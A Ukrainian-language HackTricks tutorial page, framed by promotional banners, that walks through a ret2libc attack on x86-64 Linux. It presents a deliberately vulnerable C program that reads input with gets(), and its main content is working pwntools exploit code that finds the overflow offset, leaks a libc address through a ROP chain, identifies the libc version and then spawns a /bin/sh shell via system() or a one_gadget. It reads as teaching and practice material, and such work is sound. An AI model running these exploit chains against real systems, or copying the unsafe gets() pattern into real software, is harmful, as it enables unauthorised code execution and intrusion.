| .. | ||
| README.md | ||
| rop-leaking-libc-template.md | ||
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.
Швидкий огляд
- Знайдіть зміщення переповнення
- Знайдіть гаджети
POP_RDI,PUTS_PLTтаMAIN_PLT - Використовуйте попередні гаджети для витоку адреси пам'яті puts або іншої функції libc та знайдіть версію libc (завантажте її)
- З бібліотекою обчисліть ROP та використовуйте його
Інші посібники та бінарні файли для практики
У цьому посібнику буде використано код/бінарний файл, запропонований у цьому посібнику: https://tasteofsecurity.com/security/ret2libc-unknown-libc/
Інші корисні посібники: https://made0x78.com/bseries-ret2libc/, https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html
Код
Ім'я файлу: vuln.c
#include <stdio.h>
int main() {
char buffer[32];
puts("Simple ROP.\n");
gets(buffer);
return 0;
}
gcc -o vuln vuln.c -fno-stack-protector -no-pie
ROP - Витік шаблону LIBC
Я збираюся використати код, розташований тут, щоб створити експлойт.
Завантажте експлойт та помістіть його в ту саму теку, що і вразливий бінарний файл, і надайте необхідні дані скрипту:
{% content-ref url="rop-leaking-libc-template.md" %} rop-leaking-libc-template.md {% endcontent-ref %}
1- Пошук зсуву
Шаблон потребує зсуву перед продовженням експлойту. Якщо ніякий не наданий, він виконає необхідний код для його знаходження (за замовчуванням OFFSET = ""):
###################
### Find offset ###
###################
OFFSET = ""#"A"*72
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
payload = cyclic(1000)
print(r.clean())
r.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#cyclic_find(0x6161616b) # Find the offset of those bytes
return
Виконайте python template.py, відкриється консоль GDB зі збоєм програми. У цій консолі GDB виконайте x/wx $rsp, щоб отримати байти, які будуть перезаписувати RIP. Нарешті, отримайте зсув за допомогою консолі Python:
from pwn import *
cyclic_find(0x6161616b)
Після знаходження зсуву (у цьому випадку 40) змініть змінну OFFSET всередині шаблону, використовуючи це значення.
OFFSET = "A" * 40
Інший спосіб - використовувати: pattern create 1000 -- виконати до ret -- pattern seach $rsp з GEF.
2- Пошук гаджетів
Тепер нам потрібно знайти гаджети ROP всередині бінарного файлу. Ці гаджети ROP будуть корисні для виклику puts для пошуку використовуваної libc, а пізніше для запуску кінцевої атаки.
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
POP_RDI = (rop.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
RET = (rop.find_gadget(['ret']))[0]
log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
PUTS_PLT потрібно для виклику функції puts.
MAIN_PLT потрібно для виклику головної функції знову після одного взаємодії для експлуатації переповнення знову (безкінечні раунди експлуатації). Використовується в кінці кожного ROP для виклику програми знову.
POP_RDI потрібно для передачі параметра у викликану функцію.
На цьому етапі вам не потрібно виконувати нічого, оскільки все буде знайдено за допомогою pwntools під час виконання.
3- Пошук бібліотеки LIBC
Тепер час знайти, яка версія бібліотеки libc використовується. Для цього ми збираємося витікати адресу в пам'яті функції puts, а потім ми збираємося шукати, в якій версії бібліотеки знаходиться версія puts за цією адресою.
def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
#Send our rop-chain payload
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
#Parse leaked address
recieved = p.recvline().strip()
leak = u64(recieved.ljust(8, "\x00"))
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
#If not libc yet, stop here
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
return hex(leak)
get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()
Для цього найважливішим рядком виконаного коду є:
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
Це відправить деякі байти, поки перезаписання RIP не стане можливим: OFFSET.
Потім воно встановить адресу гаджета POP_RDI, щоб наступна адреса (FUNC_GOT) була збережена в реєстрі RDI. Це тому, що ми хочемо викликати puts, передаючи йому адресу PUTS_GOT як адресу в пам'яті функції puts, яка зберігається за адресою, на яку вказує PUTS_GOT.
Після цього буде викликано PUTS_PLT (з PUTS_GOT всередині RDI), тому puts буде читати вміст всередині PUTS_GOT (адреса функції puts в пам'яті) і виведе її.
Нарешті, знову викликається головна функція, щоб ми могли знову використовувати переповнення.
Таким чином, ми обманули функцію puts, щоб вона вивела адресу в пам'яті функції puts (яка знаходиться в бібліотеці libc). Тепер, коли у нас є ця адреса, ми можемо з'ясувати, яка версія libc використовується.
Оскільки ми експлуатуємо деякий локальний бінарний файл, не потрібно визначати, яка версія libc використовується (просто знайдіть бібліотеку в /lib/x86_64-linux-gnu/libc.so.6).
Але в разі віддаленого використання уразливості я поясню, як ви можете це зробити:
3.1- Пошук версії libc (1)
Ви можете знайти, яка бібліотека використовується на веб-сторінці: https://libc.blukat.me/
Це також дозволить вам завантажити виявлену версію libc
3.2- Пошук версії libc (2)
Ви також можете зробити:
$ git clone https://github.com/niklasb/libc-database.git$ cd libc-database$ ./get
Це займе деякий час, будьте терплячі.
Для того, щоб це працювало, нам потрібно:
- Ім'я символу libc:
puts - Витік адреси libc:
0x7ff629878690
Ми можемо визначити, яка libc найімовірніше використовується.
./find puts 0x7ff629878690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)
Ми отримуємо 2 відповіді (ви повинні спробувати другу, якщо перша не працює). Завантажте перший:
./download libc6_2.23-0ubuntu10_amd64
Getting libc6_2.23-0ubuntu10_amd64
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
Скопіюйте libc з libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so в наш робочий каталог.
3.3- Інші функції для витоку
puts
printf
__libc_start_main
read
gets
4- Знаходження адреси на основі бібліотеки libc та експлуатація
На цьому етапі ми повинні знати, яку бібліотеку libc використовується. Оскільки ми експлуатуємо локальний бінарний файл, я використовуватиму лише: /lib/x86_64-linux-gnu/libc.so.6
Таким чином, на початку template.py змініть змінну libc на: libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
Надавши шлях до бібліотеки libc, решта експлойту буде автоматично розрахована.
У функції get_addr буде розрахована базова адреса libc:
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
{% hint style="info" %} Зверніть увагу, що кінцева базова адреса libc повинна закінчуватися на 00. Якщо це не ваш випадок, ви, можливо, витікали неправильну бібліотеку. {% endhint %}
Потім адреса функції system та адреса рядка "/bin/sh" будуть обчислені від базової адреси libc та задані бібліотекою libc.
BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
EXIT = libc.sym["exit"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
Нарешті, експлойт виконання /bin/sh буде підготовлений для відправки:
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
p.clean()
p.sendline(rop2)
#### Interact with the shell #####
p.interactive() #Interact with the conenction
Давайте поясним цей останній ROP.
Останній ROP (rop1) завершився викликом функції main знову, тоді ми можемо знову використати переповнення (ось чому тут знову є OFFSET). Потім ми хочемо викликати POP_RDI, спрямовуючи на адресу "/bin/sh" (BINSH) і викликати функцію system (SYSTEM), оскільки адреса "/bin/sh" буде передана як параметр.
Нарешті, викликається адреса функції виходу, щоб процес коректно завершився і не було створено жодного сповіщення.
Таким чином, експлойт виконає оболонку _/bin/sh_.
4(2)- Використання ONE_GADGET
Ви також можете використовувати ONE_GADGET , щоб отримати оболонку замість використання system та "/bin/sh". ONE_GADGET знайде всередині бібліотеки libc якийсь спосіб отримати оболонку, використовуючи лише одну адресу ROP.
Однак, зазвичай є деякі обмеження, найпоширеніші та легкі для уникнення, такі як [rsp+0x30] == NULL. Оскільки ви контролюєте значення в RSP, вам просто потрібно відправити ще деякі значення NULL, щоб уникнути обмеження.
ONE_GADGET = libc.address + 0x4526a
rop2 = base + p64(ONE_GADGET) + "\x00"*100
ВИКОРИСТАННЯ ФАЙЛУ
Ви можете знайти шаблон для використання цієї вразливості тут:
{% content-ref url="rop-leaking-libc-template.md" %} rop-leaking-libc-template.md {% endcontent-ref %}
ЗАГАЛЬНІ ПРОБЛЕМИ
MAIN_PLT = elf.symbols['main'] не знайдено
Якщо символ "main" не існує. Тоді ви можете просто де знаходиться основний код:
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
0000000000401080 <.text>:
і встановити адресу вручну:
MAIN_PLT = 0x401080
Puts не знайдено
Якщо бінарний файл не використовує Puts, вам слід перевірити, чи він використовує
sh: 1: %s%s%s%s%s%s%s%s: not found
Якщо ви знайдете цю помилку після створення всіх експлойтів: sh: 1: %s%s%s%s%s%s%s%s: not found
Спробуйте відняти 64 байти від адреси "/bin/sh":
BINSH = next(libc.search("/bin/sh")) - 64
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!
Інші способи підтримки HackTricks:
- Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
- Отримайте офіційний PEASS & HackTricks мерч
- Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
- Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами на Twitter 🐦 @hacktricks_live.
- Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks і HackTricks Cloud репозиторіїв на GitHub.